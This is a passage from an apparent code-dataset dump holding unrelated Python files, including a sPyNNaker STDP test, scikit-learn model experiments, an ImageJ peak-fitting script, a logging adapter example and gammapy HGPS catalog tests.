software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\nfrom spynnaker.pyNN.models.neuron.synapse_dynamics import (\n calculate_spike_pair_additive_stdp_weight)\nfrom spinnaker_testbase import BaseTestCase\nimport pyNN.spiNNaker as p\nimport numpy\n\n\ndef structural_with_stdp():\n p.setup(1.0)\n pre_spikes = numpy.array(range(0, 10, 2))\n pre_spikes_last_neuron = pre_spikes[pre_spikes > 0]\n A_plus = 0.01\n A_minus = 0.01\n tau_plus = 20.0\n tau_minus = 20.0\n w_min = 0.0\n w_max = 5.0\n w_init_1 = 5.0\n delay_1 = 2.0\n w_init_2 = 4.0\n delay_2 = 1.0\n stim = p.Population(1, p.SpikeSourceArray(pre_spikes), label=\"stim\")\n pop = p.Population(1, p.IF_curr_exp(), label=\"pop\")\n pop_2 = p.Population(1, p.IF_curr_exp(), label=\"pop_2\")\n pop_3 = p.Population(1, p.IF_curr_exp(), label=\"pop_3\")\n pop_4 = p.Population(1, p.IF_curr_exp(), label=\"pop_4\")\n pop.record(\"spikes\")\n pop_2.record(\"spikes\")\n proj = p.Projection(\n stim, pop, p.FromListConnector([]), p.StructuralMechanismSTDP(\n partner_selection=p.LastNeuronSelection(),\n formation=p.DistanceDependentFormation([1, 1], 1.0),\n elimination=p.RandomByWeightElimination(2.0, 0, 0),\n timing_dependence=p.SpikePairRule(\n tau_plus, tau_minus, A_plus, A_minus),\n weight_dependence=p.AdditiveWeightDependence(w_min, w_max),\n f_rew=1000, initial_weight=w_init_1, initial_delay=delay_1,\n s_max=1, seed=0, weight=0.0, delay=1.0))\n proj_2 = p.Projection(\n stim, pop_2, p.FromListConnector([]), p.StructuralMechanismSTDP(\n partner_selection=p.RandomSelection(),\n formation=p.DistanceDependentFormation([1, 1], 1.0),\n elimination=p.RandomByWeightElimination(4.0, 0, 0),\n timing_dependence=p.SpikePairRule(\n tau_plus, tau_minus, A_plus, A_minus),\n weight_dependence=p.AdditiveWeightDependence(w_min, w_max),\n f_rew=1000, initial_weight=w_init_2, initial_delay=delay_2,\n s_max=1, seed=0, weight=0.0, delay=1.0))\n proj_3 = p.Projection(\n stim, pop_3, p.FromListConnector([(0, 0)]),\n p.StructuralMechanismSTDP(\n partner_selection=p.LastNeuronSelection(),\n formation=p.DistanceDependentFormation([1, 1], 0.0),\n elimination=p.RandomByWeightElimination(4.0, 1.0, 1.0),\n timing_dependence=p.SpikePairRule(\n tau_plus, tau_minus, A_plus, A_minus),\n weight_dependence=p.AdditiveWeightDependence(w_min, w_max),\n f_rew=1000, initial_weight=2.0, initial_delay=5.0,\n s_max=1, seed=0, weight=0.0, delay=1.0))\n proj_4 = p.Projection(\n stim, pop_4, p.FromListConnector([(0, 0)]),\n p.StructuralMechanismSTDP(\n partner_selection=p.RandomSelection(),\n formation=p.DistanceDependentFormation([1, 1], 0.0),\n elimination=p.RandomByWeightElimination(4.0, 1.0, 1.0),\n timing_dependence=p.SpikePairRule(\n tau_plus, tau_minus, A_plus, A_minus),\n weight_dependence=p.AdditiveWeightDependence(w_min, w_max),\n f_rew=1000, initial_weight=4.0, initial_delay=3.0,\n s_max=1, seed=0, weight=0.0, delay=1.0))\n p.run(10)\n\n conns = list(proj.get([\"weight\", \"delay\"], \"list\"))\n conns_2 = list(proj_2.get([\"weight\", \"delay\"], \"list\"))\n conns_3 = list(proj_3.get([\"weight\", \"delay\"], \"list\"))\n conns_4 = list(proj_4.get([\"weight\", \"delay\"], \"list\"))\n\n spikes_1 = [s.magnitude\n for s in pop.get_data(\"spikes\").segments[0].spiketrains]\n spikes_2 = [s.magnitude\n for s in pop_2.get_data(\"spikes\").segments[0].spiketrains]\n\n p.end()\n\n print(conns)\n print(conns_2)\n print(conns_3)\n print(conns_4)\n\n w_final_1 = calculate_spike_pair_additive_stdp_weight(\n pre_spikes_last_neuron, spikes_1[0], w_init_1, delay_1,\n A_plus, A_minus, tau_plus, tau_minus)\n w_final_2 = calculate_spike_pair_additive_stdp_weight(\n pre_spikes, spikes_2[0], w_init_2, delay_2, A_plus, A_minus,\n tau_plus, tau_minus)\n print(w_final_1, spikes_1[0])\n print(w_final_2, spikes_2[0])\n\n assert len(conns) == 1\n assert conns[0][3] == delay_1\n assert (conns[0][2] >= w_final_1 - 0.01 and\n conns[0][2] <= w_final_1 + 0.01)\n assert len(conns_2) == 1\n assert conns_2[0][3] == delay_2\n assert (conns_2[0][2] >= w_final_2 - 0.01 and\n conns_2[0][2] <= w_final_2 + 0.01)\n assert len(conns_3) == 0\n assert len(conns_4) == 0\n\n\nclass TestStructuralWithSTDP(BaseTestCase):\n\n def test_structural_with_stdp(self):\n self.runsafe(structural_with_stdp)\n\n\nif __name__ == \"__main__\":\n structural_with_stdp()\n","sub_path":"spynnaker_integration_tests/test_struct_pl/test_structural_with_stdp.py","file_name":"test_structural_with_stdp.py","file_ext":"py","file_size_in_byte":5321,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"518514098","text":"import os\n\ndef get_npy():\n '''loop each folder in current folder and find the .npy files'''\n folder = [each for each in os.listdir('.') if os.path.isdir(each)]\n #print(folder)\n for each in folder:\n os.chdir(each)\n files = os.listdir('.')\n for every in files:\n if '.npy' in every:\n import pyTracker.get_data as get_data\n get_data.main()\n break\n os.chdir('..')\n\nget_npy()\n \n","sub_path":"pyTracker/multi_get_data.py","file_name":"multi_get_data.py","file_ext":"py","file_size_in_byte":475,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"182188507","text":"import numpy as np\nimport sklearn\nfrom sklearn.discriminant_analysis import LinearDiscriminantAnalysis\nfrom sklearn.ensemble import BaggingClassifier, RandomForestClassifier\nimport matplotlib.pyplot as plt\nfrom classifier import *\nfrom sklearn.svm import SVC\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.tree import DecisionTreeClassifier\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.discriminant_analysis import LinearDiscriminantAnalysis\nfrom sklearn.ensemble import AdaBoostClassifier\nfrom sklearn.model_selection import cross_val_score\n\n\nclass DecisionTree:\n def __init__(self, maxDepth=None):\n \"\"\"\n initializing decision tree and model to be trained.\n :param maxDepth: maximum depth of tree.\n \"\"\"\n self.model = None\n self.tree = DecisionTreeClassifier(max_depth=maxDepth)\n\n def fit(self, x: np.array, y: np.array):\n \"\"\"\n fit the model:\n :param x: dataset\n :param y: response vector\n :return: nothing, trains the self.model.\n \"\"\"\n self.model = self.tree.fit(x, y)\n\n def predict(self, x: np.array):\n \"\"\"\n gets test set and predicts the response vector.\n :param x: test set\n :return: predicted vector.\n \"\"\"\n return self.tree.predict(x)\n\n\ndef score(model, x: np.array, y: np.array):\n \"\"\"\n runs the model predition on x and compares to the real y\n :param model: one of the models\n :param x: test set\n :param y: real y\n :return: dictionary contains num of samples, fp, tp, acuuracy.\n \"\"\"\n y_predict = model.predict(x)\n error, true_pos, true_neg, false_pos, false_neg, n, p = 0, 0, 0, 0, 0, 0, 0\n tp = [0, 0, 0, 0, 0]\n fp = [[0, 0, 0, 0, 0], [0, 0, 0, 0, 0], [0, 0, 0, 0, 0], [0, 0, 0, 0, 0],\n [0, 0, 0, 0, 0]]\n for i in range(len(y)):\n if y_predict[i] != y[i]:\n error += 1\n fp[y[i]][y_predict[i]] += 1\n else:\n tp[y_predict[i]] += 1\n score_dict = {\"num_samples\": len(y), \"fp table\": fp, \"tp table\": tp,\n \"accuracy\": sum(tp) / len(y)}\n return score_dict\n\n\ndef runTTmodel(model, X_train, Y_train, X_test, Y_test):\n \"\"\"\n trains a model on X_train, Y_train and runs on X_test, Y_test.\n :param model: one of the our models.\n :param X_train: train set, numpy array.\n :param Y_train: trains response vector, numpy array.\n :param X_test: test set.\n :param Y_test: test response vector.\n :return: nothing.\n \"\"\"\n model.fit(X_train, Y_train)\n score_dict = score(model, X_test, Y_test)\n print(\"false predictions: predicted column j while i is true label\")\n fp = score_dict[\"fp table\"]\n for i in range(len(fp)):\n print(fp[i])\n print(\"tp table\", score_dict[\"tp table\"])\n print(\"accuracy\", score_dict[\"accuracy\"])\n\n\ndef runTrees(X_train, Y_train, X_test, Y_test):\n \"\"\"\n trains the train set by random forest and checks it by the test set.\n :param X_train: train set.\n :param Y_train: train response vector.\n :param X_test: test set.\n :param Y_test:test response vector.\n :return: nothing.\n \"\"\"\n print(\"Trees models\")\n for i in range(1, 5):\n dt = DecisionTree(i, )\n print(\"Max depth:\", i)\n runTTmodel(dt, X_train, Y_train, X_test, Y_test)\n\n\ndef runSVM(X_train, Y_train, X_test, Y_test):\n \"\"\"\n trains the train set by SVM and checks it by the test set.\n :param X_train: train set.\n :param Y_train: train response vector.\n :param X_test: test set.\n :param Y_test:test response vector.\n :return: nothing.\n \"\"\"\n print(\"SVM models\")\n types = ['linear', 'poly']\n multi_ways = ['ovo', 'ovr']\n for i in range(1, 5):\n for tpe in types:\n for mul_func in multi_ways:\n dt = SVC(i, ker=tpe, decision=mul_func)\n print(\"lmbda:\", i, \"svm type:\", tpe, \"multi:\", mul_func)\n runTTmodel(dt, X_train, Y_train, X_test, Y_test)\n\n\ndef runKnn(X_train, Y_train, X_test, Y_test):\n \"\"\"\n trains the train set by K-neares-neighbors and checks it by the test set.\n :param X_train: train set.\n :param Y_train: train response vector.\n :param X_test: test set.\n :param Y_test:test response vector.\n :return: nothing.\n \"\"\"\n print(\"KNN models\")\n for i in (list(range(4, 50, 5)) + [2, 3]):\n print(\"number of neighbors:\", i)\n kn = KNeighborsClassifier(n_neighbors=i)\n runTTmodel(kn, X_train, Y_train, X_test, Y_test)\n\n\ndef runLDA(X_train, Y_train, X_test, Y_test):\n \"\"\"\n trains the train set by LDA and checks it by the test set.\n :param X_train: train set.\n :param Y_train: train response vector.\n :param X_test: test set.\n :param Y_test:test response vector.\n :return: nothing.\n \"\"\"\n print(\"LDA model\")\n set_lda = ['svd', 'lsqr']\n for ld in set_lda:\n print(\"LDA Model:\", ld)\n lda = LinearDiscriminantAnalysis(solver=ld)\n runTTmodel(lda, X_train, Y_train, X_test, Y_test)\n\n\ndef runBag(X_train, Y_train, X_test, Y_test):\n # dt = DecisionTreeClassifier(max_depth=5)\n # runTTmodel(dt, X_train, Y_train, X_test, Y_test)\n print(\"Bag model\")\n bm = BaggingClassifier(base_estimator=DecisionTreeClassifier(max_depth=5),\n n_estimators=30)\n runTTmodel(bm, X_train, Y_train, X_test, Y_test)\n\n\ndef runTrainTest(X, Y, newX, newY):\n runTrees(X, Y, newX, newY)\n runKnn(X, Y, newX, newY)\n # runSVM(X, Y, newX, newY)\n runLDA(X, Y, newX, newY)\n\n\ndef baggingModels(models, X_train, Y_train, X_test, Y_test):\n accuracy_arr = np.zeros(len(models))\n print(\"Bagging\")\n for i, model in enumerate(models):\n print(\"Bagging model:\", model)\n bm = BaggingClassifier(base_estimator=model)\n accuracy_arr[i] = runTTmodel(bm, X_train, Y_train, X_test, Y_test)\n print(accuracy_arr)\n\n\ndef run_adaboost(X_train, Y_train, X_test, Y_test):\n \"\"\"\n runs adaboost on the data.\n :param X_train: train set.\n :param Y_train: train response vector.\n :param X_test: test set.\n :param Y_test:test response vector.\n :return: nothing.\n \"\"\"\n model = AdaBoostClassifier(\n base_estimator=DecisionTreeClassifier(max_depth=2),\n n_estimators=50) # 0.477\n # model = AdaBoostClassifier(base_estimator=SVM(30))\n runTTmodel(model, X_train, Y_train, X_test, Y_test)\n\n\ndef learner_by_loc(X_train, Y_train, X_test, Y_test):\n \"\"\"\n learning algorithm just by location.\n :param X_train: train set.\n :param Y_train: train response vector.\n :param X_test: test set.\n :param Y_test:test response vector.\n :return: nothing.\n \"\"\"\n feats = ['Latitude', 'Longitude']\n for name in list(X_train.columns):\n if \"half\" in name:\n feats.append(name)\n X_train = X_train[feats]\n X_test = X_test[feats]\n X_train, Y_train = X_train.to_numpy(), Y_train.to_numpy()\n X_test, Y_test = X_test.to_numpy(), Y_test.to_numpy()\n model = BaggingClassifier(\n base_estimator=DecisionTreeClassifier(max_depth=400), n_estimators=100)\n runTTmodel(model, X_train, Y_train, X_test, Y_test)\n\n\ndef plot_points_q_99(x_p, x_n, x_p1, x_n1, x5, ax, num_of_samples):\n ax.scatter(x_p.T[0], x_p.T[1], s=1, marker='.', c='blue')\n ax.scatter(x_n.T[0], x_n.T[1], s=1, marker='.', c='orange')\n ax.scatter(x_p1.T[0], x_p1.T[1], s=1, marker='.', c='red')\n ax.scatter(x_n1.T[0], x_n1.T[1], s=1, marker='.', c='green')\n ax.scatter(x5.T[0], x5.T[1], s=1, marker='.', c='pink')\n ax.set_title(f'Number of samples: {num_of_samples[0]}', size=15)\n ax.set_xlabel('Longitude', size=10)\n ax.set_ylabel('Latitude', size=10)\n\n\ndef showfigs(x, y, predicted_y):\n xlong = x['Longitude'].to_numpy()\n xlong = np.reshape(xlong, (-1, 1))\n xlat = x['Latitude'].to_numpy()\n xlat = np.reshape(xlat, (-1, 1))\n x_location = np.hstack((xlong, xlat))\n x_1 = x_location[y == 0]\n x_2 = x_location[y == 1]\n x_3 = x_location[y == 2]\n x_4 = x_location[y == 3]\n x_5 = x_location[y == 4]\n print(\"size of \", crimes_dict[0], \"is: \", x_1.shape)\n print(\"size of \", crimes_dict[1], \"is: \", x_2.shape)\n print(\"size of \", crimes_dict[2], \"is: \", x_3.shape)\n print(\"size of \", crimes_dict[3], \"is: \", x_4.shape)\n print(\"size of \", crimes_dict[4], \"is: \", x_5.shape)\n print(x_location)\n fig = plt.figure()\n ax = fig.add_subplot(111)\n plot_points_q_99(x_1, x_2, x_3, x_4, x_5, ax, x_location.shape)\n ax.legend()\n fig.show()\n\n\ndef checkPicsLda(X, Y, X_test, Y_test):\n \"\"\"\n show diffrences between the figures of the real ones\n and the predicted ones.\n \"\"\"\n x = X\n X, Y = X.to_numpy(), Y.to_numpy()\n X_test, Y_test = X_test.to_numpy(), Y_test.to_numpy()\n ld = LinearDiscriminantAnalysis()\n ld.fit(X, Y)\n predY = ld.predict(X_test)\n showfigs(x, Y_test, predY)\n\n\ndef k_folds(k, X, y, models):\n \"\"\"\n splits to k folds an the returns the best model and its average.\n :param k: number of folds.\n :param X: data set, numpy array.\n :param y: vector response, numpy array.\n :param models: differnt models for prdiction\n :return:\n \"\"\"\n means = []\n for model in models:\n cross = cross_val_score(model, X, y, cv=k)\n print(cross)\n means.append(np.mean(cross))\n return np.argmax(np.array(means)), np.max(np.array(means))\n\n\ndef create_models():\n \"\"\"\n creates different type of models to be tested in k-folds\n :return: the models, array.\n \"\"\"\n models_chunks = []\n\n # trees\n temp = []\n for i in (list(range(2, 21, 7)) + [3, 4]):\n temp.append(BaggingClassifier(base_estimator=DecisionTreeClassifier(\n max_depth=i), n_estimators=6))\n models_chunks.append(temp)\n\n # k-nn\n temp = []\n for i in (list(range(4, 50, 22)) + [2, 5]):\n temp.append(BaggingClassifier(KNeighborsClassifier(n_neighbors=i),\n n_estimators=2))\n models_chunks.append(temp)\n\n # lda\n temp = []\n set_lda = ['svd', 'lsqr']\n for ld in set_lda:\n temp.append(BaggingClassifier(LinearDiscriminantAnalysis(solver=ld),\n n_estimators=10))\n models_chunks.append(temp)\n\n return models_chunks\n\n\ndef find_best(X, y):\n \"\"\"\n runs the k-folds on different models.\n :param X: dataset\n :param y: response vector\n :return: nothing\n \"\"\"\n models_chunks = create_models()\n for chunk in models_chunks:\n print(k_folds(5, X, y, chunk))\n\n","sub_path":"task2/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":10488,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"429322815","text":"\"\"\" List Comprehension\n\nEn Python 3 map, filter y reduce perderán importancia, \nse desaconsejerán en favor de las list comprehensions.\n\nEstá característica consiste en la construcción que \npermite crear listas a partir de otras listas.\n\"\"\"\n\nl = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10]\n\n# replace map\nl2 = [n ** 2 for n in l]\n\nprint(l2)\n\n# replace filter\nl3 = [n for n in l if n % 2.0 == 0]\nprint(l3)\n\nm = [0, 1, 2, 3]\nn = ['a', 'b']\n# o = [ s * v for s in n\n# for v in m\n# if v > 0]\n\no = []\n\nfor s in n:\n for v in m:\n if v > 0:\n o.append(s * v)\n\nprint(o)\n\n","sub_path":"python_para_todos_p2/list_comprehension.py","file_name":"list_comprehension.py","file_ext":"py","file_size_in_byte":598,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"239607330","text":"from __future__ import division\n\nimport math\nimport re\nimport time\n\nfrom java.lang import Runnable\nfrom java.lang import Runtime\nfrom java.lang import RuntimeException\nfrom java.lang import Thread\nfrom java.lang.reflect import Array\nfrom java.util.concurrent.atomic import AtomicInteger\n\nfrom ij import IJ\nfrom ij import ImagePlus\nfrom ij.plugin import Duplicator\nfrom ij.process import FloatProcessor\n\nfrom org.apache.commons.math3.fitting import SimpleCurveFitter\nfrom org.apache.commons.math3.fitting import WeightedObservedPoints\nfrom org.apache.commons.math3.analysis import ParametricUnivariateFunction\n\npattern_eloss = re.compile('(\\d+(?:\\.\\d+)?)eV')\n\nclass ZProfiles:\n\n def __init__(self, imp, offset):\n self.imp = imp\n self.loss_offset = offset\n self.w = imp.getWidth()\n self.h = imp.getHeight()\n self.index = self.w * self.h\n self.offset = [0] * (self.w * self.h)\n self.width = [0] * (self.w * self.h)\n self.amplitude = [0] * (self.w * self.h)\n self.elosses = []\n self.pixels = []\n for z in range(self.imp.getStackSize()):\n label = self.imp.getStack().getShortSliceLabel(z+1)\n match = pattern_eloss.search(label)\n loss = float(match.group(1)) - self.loss_offset\n self.elosses.append(loss)\n self.pixels.append(self.imp.getStack().getPixels(z + 1))\n IJ.showProgress(z + 1, self.imp.getStackSize())\n\n\ndef create_nic(data):\n fp = FloatProcessor(data.w, data.h)\n for y in range(data.h):\n for x in range(data.w):\n index = x + y * data.w\n fp.setf(index, data.offset[index])\n imp = ImagePlus(\"NIC\", fp)\n return imp\n\ndef create_width(data):\n fp = FloatProcessor(data.w, data.h)\n for y in range(data.h):\n for x in range(data.w):\n index = x + y * data.w\n fp.setf(index, data.width[index])\n imp = ImagePlus(\"width\", fp)\n return imp\n\ndef create_amplitude(data):\n fp = FloatProcessor(data.w, data.h)\n for y in range(data.h):\n for x in range(data.w):\n index = x + y * data.w\n fp.setf(index, data.amplitude[index])\n imp = ImagePlus(\"amplitude\", fp)\n return imp\n\nclass Zlp(ParametricUnivariateFunction):\n\n def value(self, x, parameters):\n a, m, s = parameters\n return a * math.exp(-(x - m)**4/(4 * (1.1 * s)**4))\n\n def gradient(self, x, parameters):\n a, m, s = parameters\n da = math.exp(-(m - x)**4 / (4 * (1.1 * s)**4))\n dm = -(m - x)**3 * self.value(x, parameters) / (1.1 * s)**4\n ds = (m - x)**4 * self.value(x, parameters) / (1.1 * s)**5\n return [da, dm, ds]\n\ndef create_fitter():\n func = Zlp()\n params_start = [1e4, 0, 1.4]\n fitter = SimpleCurveFitter.create(func, params_start)\n return fitter\n\ndef fit_gauss(fitter, data, index):\n points = WeightedObservedPoints()\n for i, z in enumerate(data.elosses):\n points.add(1, z, data.pixels[i][index])\n amplitude, offset, width = fitter.fit(points.toList())\n data.offset[index] = offset\n data.width[index] = width\n data.amplitude[index] = amplitude\n\ndef multithread_func(func, data):\n threads = Array.newInstance(Thread, Runtime.getRuntime().availableProcessors())\n print('Processing %d profiles with %d threads.' % (data.index, len(threads)))\n ai = AtomicInteger(0)\n progress = AtomicInteger(1)\n class Body(Runnable):\n\n def __init__(self):\n self.fitter = create_fitter()\n\n def run(self):\n for i in (ai.getAndIncrement() for _ in range(data.index)):\n if i < data.index:\n func(self.fitter, data, i)\n IJ.showProgress(progress.getAndIncrement(), data.index)\n for i in range(len(threads)):\n threads[i] = Thread(Body())\n threads[i].start()\n for thread in threads:\n thread.join()\n\ndef main():\n try:\n inputImp = IJ.getImage()\n if inputImp.getStackSize() <= 1:\n IJ.showMessage(\"Error\", \"There must be at least a stack open.\")\n return\n except RuntimeException:\n # Exit if IJ.getImage() was not able to return an image.\n return\n\n # We guess that the stack is sorted by energy loss and that the ZLP is at the centre of the stack.\n offset_match = pattern_eloss.search(\n inputImp.getStack().getShortSliceLabel(\n int(math.floor(inputImp.getStackSize() / 2)) + 1\n )\n )\n offset = float(offset_match.group(1))\n offset = IJ.getNumber(\"Enter energy loss offset: \", offset)\n if (offset == IJ.CANCELED) :\n return\n\n IJ.showStatus(\"Preparing the data...\")\n IJ.showProgress(0)\n zProfiles = ZProfiles(inputImp, offset)\n if zProfiles == IJ.CANCELED:\n return\n IJ.showStatus(\"Calculating the NIC...\")\n IJ.showProgress(0)\n start_time = time.time()\n '''\n for profile in zProfiles:\n fit_gauss(zProfiles.fitter, profile)\n '''\n multithread_func(fit_gauss, zProfiles)\n print('Fitting took %.3fs to finish.' % (time.time() - start_time,))\n create_nic(zProfiles).show()\n create_width(zProfiles).show()\n create_amplitude(zProfiles).show()\n\nif __name__ == '__main__':\n main()","sub_path":"Jython/measureNIC.py","file_name":"measureNIC.py","file_ext":"py","file_size_in_byte":5241,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"281022138","text":"#! /usr/bin/env python3\n# coding: utf-8\n#\n# author: kaku\n# date: 18/07/29\n#\n# GitHub:\n#\n# https://github.com/kakuchange\n#\n# Description:\n#\n# Custom you logger(adaptor).\nimport logging\n\n\nclass CustomAdapter(logging.LoggerAdapter):\n \"\"\"\n This example adapter expects the passed in dict-like object to have a\n 'connid' key, whose value in brackets is prepended to the log message.\n \"\"\"\n def process(self, msg, kwargs):\n return 'I\\'m dynamic info => [%s] || old info => %s' % (self.extra['connid'], msg), kwargs\n\n\ndef actual_use():\n # root logger\n logger = logging.getLogger()\n # set level\n logger.setLevel(logging.DEBUG)\n # set formatter\n formatter = logging.Formatter('[%(levelname).1s] %(asctime)s %(name)s: %(message)s')\n # file & console stream handler\n sh = logging.StreamHandler()\n fh = logging.FileHandler(filename='dynamic.log')\n # set handler's level format\n sh.setLevel(logging.DEBUG)\n fh.setLevel(logging.DEBUG)\n\n sh.setFormatter(formatter)\n fh.setFormatter(formatter)\n # add handler to logger\n logger.addHandler(sh)\n logger.addHandler(fh)\n # get context info loger(adaptor)\n adaptor = CustomAdapter(logger, {'connid': 'I am kaku'})\n\n # final 对比一下, 加了上下文信息的日志与row logger :)\n logger.debug('hi i am row looooooger!')\n adaptor.debug('hi i am context adaptoooooor!')\n\n\nif __name__ == \"__main__\":\n actual_use()\n","sub_path":"python_example/log_tool/mycontext_info_adaptor.py","file_name":"mycontext_info_adaptor.py","file_ext":"py","file_size_in_byte":1439,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"194544920","text":"\"\"\"\ngets rid of any line in the orbit file that is not 6 entries\n\nhttp://stackoverflow.com/questions/4710067/deleting-a-specific-line-in-a-file-python\n\"\"\"\n\nfn = \"orbit0.dat\"\n\nf = open(fn, \"r+\")\nlines = f.readlines()\nf.seek(0)\nfor line in lines:\n line_sp = line.split()\n if len(line_sp) == 6:\n # There should be six entries in each line (http://fargo.in2p3.fr/Output)\n f.write(line)\nf.truncate()\nf.close()","sub_path":"code_fargo/cleanseOrbitFile.py","file_name":"cleanseOrbitFile.py","file_ext":"py","file_size_in_byte":424,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"292822748","text":"from thirtycli.actions.common import Action\nfrom thirtycli import utils\n\n\nclass PublishAction(Action):\n \"\"\"Publish an app.\"\"\"\n\n ##\n # Publish an application\n ##\n @utils.arg('app',\n metavar=\"\",\n help=\"The app to publish.\")\n def do_publish(self, args, global_args):\n \"\"\"Publish an app (upgrade to paid).\"\"\"\n cmd = {\n 'action': 'publish',\n }\n args.appname = args.app\n args.service = None\n\n self._run_command(args, global_args, cmd)\n","sub_path":"thirtycli/actions/publish.py","file_name":"publish.py","file_ext":"py","file_size_in_byte":531,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"542303382","text":"\n\n#calss header\nclass _WAX():\n\tdef __init__(self,): \n\t\tself.name = \"WAX\"\n\t\tself.definitions = [u'to put a thin layer of wax on the surface of something, either to make it waterproof or to improve its appearance: ', u\"to remove hair from someone's body by covering it in a thin layer of warm wax that is then pulled off: \", u'When the moon waxes, it gradually appears larger and rounder each day.', u'to speak or write in the stated way: ']\n\n\t\tself.parents = []\n\t\tself.childen = []\n\t\tself.properties = []\n\t\tself.jsondata = {}\n\n\n\t\tself.specie = 'verbs'\n\n\tdef run(self, obj1 = [], obj2 = []):\n\t\treturn self.jsondata\n","sub_path":"xai/brain/wordbase/verbs/_wax.py","file_name":"_wax.py","file_ext":"py","file_size_in_byte":613,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"106925802","text":"# law of large numbers\n\nimport random\nfrom matplotlib import pyplot as plt\n\nprobability_tails = 0.5\nn = 500\n\ncount = []\ntails = 0\n\nfor i in range(1, n):\n ran = random.random()\n if ran > probability_tails:\n tails += 1\n else:\n tails -= 1\n expected_tails = tails / i\n count.append(expected_tails)\n\nx_range = list(range(len(count)))\n\nfig = plt.figure()\nax1 = fig.add_subplot(2, 1, 1)\nax2 = fig.add_subplot(2, 1, 2)\n\nax1.plot(x_range, count, color=\"b\", label=\"expected tails\")\nax1.set_xlabel(\"n\")\nax1.set_ylabel(\"expected tails\")\nax1.set_xlim(5, n)\nax1.set_ylim(-1, 1)\nax1.axhline(0, color='black', ls='--')\n\nax2.hist(count, bins=30)\n\nplt.show()\n","sub_path":"practise matplotlib/heads_tails_distribution.py","file_name":"heads_tails_distribution.py","file_ext":"py","file_size_in_byte":670,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"599704270","text":"from utilidades import get_int_positivo\ndef main():\n den_atual = get_int_positivo('Digite o primeiro denominador: ')\n numerador = 1\n somatorio = 0\n while den_atual >= 1:\n if numerador % 2 == 0:\n somatorio -= (den_atual/numerador)\n else:\n somatorio += (numerador/den_atual)\n den_atual -= numerador\n numerador += 1\n print(f'Somatório: {somatorio:.2f}')\n \n\nmain()\n","sub_path":"Fabio03_For/Fabio03_19_soma_fracoes_3.py","file_name":"Fabio03_19_soma_fracoes_3.py","file_ext":"py","file_size_in_byte":430,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"536005214","text":"# Licensed under a 3-clause BSD style license - see LICENSE.rst\nfrom __future__ import absolute_import, division, print_function, unicode_literals\nfrom numpy.testing.utils import assert_allclose\nfrom astropy.tests.helper import assert_quantity_allclose\nfrom astropy import units as u\nfrom ...utils.testing import requires_data, requires_dependency\nfrom ..hess import SourceCatalogHGPS\n\n\n@requires_data('hgps')\nclass TestSourceCatalogHGPS:\n def setup(self):\n self.cat = SourceCatalogHGPS()\n\n def test_source_table(self):\n assert self.cat.name == 'hgps'\n assert len(self.cat.table) == 78\n\n def test_component_table(self):\n assert len(self.cat.components) == 98\n\n def test_associations_table(self):\n assert len(self.cat.associations) == 223\n\n\n@requires_data('hgps')\nclass TestSourceCatalogObjectHGPS:\n def setup(self):\n self.cat = SourceCatalogHGPS()\n # Use HESS J1825-137 as a test source\n self.source_name = 'HESS J1825-137'\n self.source = self.cat[self.source_name]\n\n def test_single_gauss(self):\n source = self.cat['HESS J1930+188']\n assert source.data['Spatial_Model'] == 'Gaussian'\n assert 'Spatial components : HGPSC 097' in str(source)\n\n def test_multi_gauss(self):\n source = self.cat['HESS J1825-137']\n assert source.data['Spatial_Model'] == '3-Gaussian'\n assert 'Spatial components : HGPSC 065, HGPSC 066, HGPSC 067' in str(source)\n\n def test_snr(self):\n source = self.cat['HESS J1713-397']\n assert source.data['Spatial_Model'] == 'Shell'\n assert 'Source name : HESS J1713-397' in str(source)\n\n def test_name(self):\n assert self.source.name == self.source_name\n\n def test_index(self):\n assert self.source.index == 54\n\n def test_data(self):\n data = self.source.data\n assert data['Source_Class'] == 'PWN'\n\n def test_pprint(self):\n self.source.pprint()\n\n def test_str(self):\n ss = self.source.__str__()\n assert 'Source name : HESS J1825-137' in ss\n assert 'Component HGPSC 065:' in ss\n\n def test_model(self):\n model = self.source.spectral_model\n pars = model.parameters\n assert_quantity_allclose(\n pars['amplitude'].quantity,\n u.Quantity(1.716531924e-11, 'TeV-1 cm-2 s-1'),\n )\n assert_quantity_allclose(\n pars['index'].quantity,\n u.Quantity(2.3770857316, ''),\n )\n assert_quantity_allclose(\n pars['reference'].quantity,\n u.Quantity(1.1561109149, 'TeV'),\n )\n\n emin, emax = u.Quantity([1, 1e10], 'TeV')\n desired = u.Quantity(self.source.data['Flux_Spec_PL_Int_1TeV'], 'cm-2 s-1')\n assert_quantity_allclose(model.integral(emin, emax), desired, rtol=0.01)\n\n def test_ecpl_model(self):\n model = self.cat['HESS J0835-455'].spectral_model\n pars = model.parameters\n assert_quantity_allclose(\n pars['amplitude'].quantity,\n u.Quantity(6.408420542586617e-12, 'TeV-1 cm-2 s-1'),\n )\n assert_quantity_allclose(\n pars['index'].quantity,\n u.Quantity(1.3543991614920847, ''),\n )\n assert_quantity_allclose(\n pars['reference'].quantity,\n u.Quantity(1.696938754239, 'TeV'),\n )\n assert_quantity_allclose(\n pars['lambda_'].quantity,\n u.Quantity(0.081517637, 'TeV-1'),\n )\n\n emin, emax = u.Quantity([1, 